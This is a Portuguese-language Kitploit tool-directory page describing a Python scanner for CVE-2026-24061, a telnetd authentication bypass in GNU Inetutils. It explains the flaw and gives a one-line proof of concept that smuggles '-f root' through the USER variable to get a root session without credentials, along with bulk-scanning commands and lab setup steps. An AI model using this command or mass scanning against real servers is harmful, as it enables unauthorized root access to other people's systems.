Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — Scanner baseado em Python que detecta a CVE-2026-24061 no GNU Inetutils telnetd, permitindo testes em lote de múltiplos alvos para a vulnerabilidade de bypass de autenticação. | Kitploit
Ferramentas/GitHubGitHub/monstertsl/cve-2026-24061
Scanners de VulnerabilidadesExploraçãoTestes de PenetraçãoAutenticaçãoFerramenta de Acesso Remoto
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Scanner baseado em Python que detecta a CVE-2026-24061 no GNU Inetutils telnetd, permitindo testes em lote de múltiplos alvos para a vulnerabilidade de bypass de autenticação.

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Detecção em Massa da Vulnerabilidade CVE-2026-24061

⚠️ Aviso: CVE-2026-24061 GNU Inetutils é um conjunto clássico de ferramentas de rede fornecido pelo projeto GNU, que inclui o serviço telnetd, ou seja, o daemon do servidor Telnet. Nas versões 1.9.3 a 2.7, o serviço telnetd apresenta uma falha crítica no fluxo de autenticação de usuários. Ao chamar o programa de login do sistema /usr/bin/login, o serviço não filtra nem valida adequadamente a variável de ambiente USER enviada pelo cliente. Um atacante pode definir um valor específico para a variável USER, injetando diretamente o parâmetro -f no comando login. O parâmetro -f do programa é usado para "pular a autenticação secundária", o que permite ao atacante contornar completamente todos os mecanismos de verificação de senha e estabelecer uma sessão remota diretamente como usuário , obtendo assim o controle máximo do servidor. Essa vulnerabilidade é extremamente perigosa, equivalente a um backdoor remoto de root público, sem necessidade de qualquer credencial.

login
root

POC de Detecção da Vulnerabilidade

root@kitploit:~
USER='-f root' telnet -a <target_ip>

Script de Detecção

demo.png

Detecção Individual

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

Detecção em Massa

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

Princípio da Vulnerabilidade

O comando acima define a variável de ambiente USER como -f root. Quando o serviço telnetd vulnerável recebe a conexão, ele constrói e executa uma chamada de sistema semelhante à seguinte:

Etapas de Reprodução

1. Instalar os programas necessários

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Descomentar a linha do telnet (garantir o formato correto)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Reiniciar o serviço

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. Verificar a porta

root@kitploit:~
sudo ss -tuln | grep ':23'

5. Teste local

root@kitploit:~
telnet localhost 23
Baixar ferramenta